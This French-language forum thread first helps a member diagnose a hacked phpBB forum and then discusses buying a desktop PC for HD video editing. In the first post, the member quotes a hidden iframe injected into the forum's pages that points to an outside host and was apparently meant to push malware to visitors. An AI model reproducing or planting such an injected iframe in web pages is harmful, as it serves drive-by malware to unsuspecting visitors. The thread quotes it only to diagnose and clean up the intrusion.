[HOTLINE TECHNIQUE]

Vous pouvez y parler de tout
Répondre
Ashvey
Saké Samuraï

Message par Ashvey »

Oki, merci d'avoir déplacé la discuss!
Bon la ligne 446
donne ça

Code : Tout sélectionner

<iframe src="http://c6y.at:8080/ts/in.cgi?pepsi144" width=125 height=125 style="visibility: hidden"></iframe>
Et j'ai le même type d'erreur si j'essaie d'aller au panneau d'administration...

Quant aux mods, je n'en ai installer aucun, et je suis le seul administrateur.
Bien que piètre administrateur dans le cas présent...

edit> bon, j'ai juste rustiné les fichiers qui paraissaient endommagé... maintenant que j'ai accès à l'administration, go install phpbb3.
ça va, ça va, say la vee!

Tsuka
Admin / Maniac

Message par Tsuka »

Maintenant c'est sur, ton forum été hacké.
Cette ligne de code a été injecté via une faille.
Le but de cette appel via iframe étant de passer un virus a tous les utilisateurs passant sur le forum...
Mais apparemment ça ne marche pas bien.
Passe donc au plus vite à la v3, indeed.

Chron
Synchrone or not synchrone ?

Message par Chron »

Youhou les gens.
Je me suis acheté ça, il y a pas longtemps.

http://www.cnetfrance.fr/produits/cames ... 381741.htm

Un camescope HD qui me sort de l'AVCHD. Par contre pour tenter de monter sur un portable, vous vous en doutez, c'est pas le top...

Je commence donc maintenant, dans un second temps à envisager de me prendre une tour pour monter tout ça.
Après une première recherche, je pensais quelque chose dans le genre :

http://micro-informatique.fnac.com/a268 ... M5800-EK7S

Avec un Intel Core 2 Quad, une carte graphique costaud, des Go de Ram, un disque dur entre 500 Go et un téra, et le reste, je sais pas trop, pour un budget entre 500 et 1000 euros tout compris.
Vu que je suis un gros flemmard (et pas très débrouillard de mes mains), je cherche un truc déjà tout monté de préférence et possibilité de passer à Windows 7 dans pas longtemps.
Si vous avez des conseils ou autre, je suis preneur.
À votre bon coeur, et merci d'avance.
@+
Chron
???, ??? ?? ?? ?? ???,???, ? ??? ?? ???

Klaim
Artisan Digital

Message par Klaim »

Tout ce qui vends vista avec te donnes une licence Windows 7 d'office dés sa sortie (a partir d'une date déjà passée).

Sinon cette tour a l'air pas mal de loin...

...mais tu es conscient que tu peux faire de sacrées économies en montant ta propre tour pas vrai? Juste pour être sur que tu saches. Bon là faut avouer que le prix semble correct (ce qui est en fait assez suprenant, ou alors je suis pas ajour sur les pièces séparées...)

Moi je serais toi si j'avais le choix je chercherai plutot du Intel Corei7 (c'est du quad core avec 2 hyperthread par core, soit l'equivalent théorique de 8 cores - et autres subtilitées dans un language de geek) niveau processeur, mais bon c'est plus haut de game et plus cher. Ya des chances pour que ce soit mieu exploité par les applications que tu comptes utiliser (montage vidéo) même si tu verrais pas immédiatement la différence mais certainement dans un an environ.

Sinon c'est déjà pas mal je trouve.

JeP
Laborieux Optimiste

Message par JeP »

Klaim a écrit :Moi je serais toi si j'avais le choix je chercherai plutot du Intel Corei7 (c'est du quad core avec 2 hyperthread par core, soit l'equivalent théorique de 8 cores - et autres subtilitées dans un language de geek) niveau processeur, mais bon c'est plus haut de game et plus cher. Ya des chances pour que ce soit mieu exploité par les applications que tu comptes utiliser (montage vidéo) même si tu verrais pas immédiatement la différence mais certainement dans un an environ.

Sinon c'est déjà pas mal je trouve.
Heeuuu... oué mais Chron veut faire du montage à priori, pas forcément trop de FX... je pense pas que ce soit nécessaire de taper dans l'i7 pour ça :kinterro:
TAMATAMATAMATAMA

Klaim
Artisan Digital

Message par Klaim »

Le core i7 c'est juste un "meilleur" quad core (ou plus dans le futur proche), donc comme dit le seul truc c'est que le quad tout court suffira amplement aujourd'hui mais personnellement je préfere prévoir sur plusieurs années.

Mais effectivement si Chron ne fait rien d'autre que du montage (genre pas de rendu de fx comme tu dis), c'est largement suffisant.

Chron

Message par Chron »

Le problème pour monter ma tour :
- Ca me gonfle.
- J'ai pas envie de passer 107 ans à choisir avec amour des composants aux noms aussi évocateurs que Advance 8715LCD, Cooler masterUCP900, à hésiter entre la Nvidia GeForce avec CUDA9500GT PCI EX ou la Nvidia GeForce avec CUDAGTS250 ...
- Si c'est au final pour me retrouver à avoir cramé 200 euros (ou plus) parce que j'ai monté un ventilo de travers ou fixé un truc à l'envers comme un noob...

Si ça peut faire économiser jusqu'à 50% du prix de la bestiole, pourquoi pas, si c'est pour racler 100 euros, autant ne pas m'emmerder la vie.
Si je m'équipe, ce serait pour quelques temps, faut que ça roule et que ça me prenne pas trop la tête...

Pour le coup du Core7, même si je comprends pas tout à ce que tu dis (mais que ça a l'air puissant, c'est sûr), je suis pas sûr d'en avoir super l'utilité, c'est pas du matériel méga pro ou l'investissement du siècle que je cherche à faire. Déjà, que le Core Quad m'a pas l'air encore super grand public, un core 7 ça se trouve que dans des boutiques de geek, je parie.
Sinon, oui, les effets spéciaux pour moi risquent de se résumer à un ou deux fondus... Pas d'explosion pyrotechnique ou de 3d mirobolante en perspective...

En tout cas merci des conseils! :kniko:
@+
Chron

Tsuka
Admin / Maniac

Message par Tsuka »

Sur ebay peut y'avoir de bonnes affaires vendues par des marques connues.
L'an dernier j'ai chopé une tour en état neuve (reconditionnée / sous garantie) avec un Quad Core et une config honnête au global pour pas cher.
Bon, c'est du Packard Bell, mais vu le tarif (350 euros) c'était imbattable, et pour l'instant no soucy.

Chron

Message par Chron »

C'est intéressant, même si ça me rassure pas forcément des tonnes (a priori, comme d'hab) d'acheter un truc un poil cher sur E-bay...
À voir. :kniko:
@+
Chron

Tsuka
Admin / Maniac

Message par Tsuka »

Oui forcément, acheter sur Ebay ... mais là il s'agissait donc de Packard Bell en vendeur (aka "Packard Bell Refresh", qui n'existe plus apparemment aujourd'hui).
ps : Yak avait étrangement commandé la même machine le lendemain ;-]

Chron

Message par Chron »

J'ai jeté un oeil sur les configs voire combien ça couterait d'assembler une machine moi-même, mais en fait ça marche pas vu que je me dis pour chaque truc "Oh... 10 euros de plus et j'ai un truc mieux", ce qui fait que j'explose le budget comme il faut. En essayant de voir ce qui va ensemble, j'y ai claqué quelques heures...
Résultat des courses, pour plus cher, j'ai un truc à peine mieux que ce genre de config toute prête...

http://micro-informatique.fnac.com/a273 ... 29H-22-TFT
Alors, pourquoi continuer à m'emmerder la vie, je vous demande?
@+
Chron

jem
CyberPet

Message par jem »

J'ai envie de dire : parce que c'est un HP et que j'ai eu plutôt des mauvaises expériences avec eux.
Ils ont notamment tendance à blinder leurs installs d'utilitaires HP à la con.
I found my freedom now.
Funny how it feels just like being alone...

Klaim
Artisan Digital

Message par Klaim »

Alors, pourquoi continuer à m'emmerder la vie, je vous demande?
Personne a dit que t'y étais obligé, tu peux payer pour que le tout soit plus simple et comme ça c'est cool. J'ai demandé pour vérifier que tu connais les avantages de l'autre option.

J'imagine qu'il faut pas mal de connaissances de base pour trouver les bons prix de toutes manière. (difficile de se rendre compte quand on est dedans depuis qu'on est jeune).

Chron

Message par Chron »

Jem>Tu sais rassurer les gens toi.

Klaim>Oui, c'est assez décourageant de passer plusieurs heures à bidouiller un devis qui tient à peu près la route, pour voir qu'en fait, en deux clics, j'aurais pu avoir à peu près la même chose... Alors avoir des bons prix ou faire le guet pour se tomber l'affaire du siècle, je crois pas que j'aurais la patience...
Bon en peaufinant mon devis, je devrais avoir quelque chose de bien costaud au final. Le truc, c'est que je pars pas avec une config en tête, mais un prix en tête... Le but n'est donc pas de faire des économies, mais d'avoir la machine la plus puissante pour une somme donnée.
@+
Chron

berseker
mouton câlin

Message par berseker »

En fait, il y a peu d'intérêt, selon moi, à acheter une config complète pièce par pièce. Par contre, une fois que tu as la machine, l'entretenir en rachetant un truc par ci par là, plutôt que d'attendre que la machine tombe en ruine pour la changer, c'est plus intéressant financièrement et ça évite de trainer un vieux tacot pendant des années.
Après, une bonne raison, il y a quelques années quand j'avais étudié le problème, de faire sa config seul, c'est que la plupart des configs toutes faites étaient du grand n'importe quoi, avec des composants qui n'allaient pas du tout ensemble (carte graphique de compétition avec une RAM ridicule, etc.) Si ce n'est pas le cas, je ne pense pas que ça vaille le coup de mettre la main à la pâte thermique.
Hervé Joncour posa sa cigarette sur le bord de la table avant de dire
-Et il est où, exactement, ce Japon?
Baldabiou leva sa canne de Jonc en l'air et la pointa par-delà les toits de Saint-Auguste.
-Par là, toujours tout droit.
Dit-il.
-Jusquà la fin du monde.

Répondre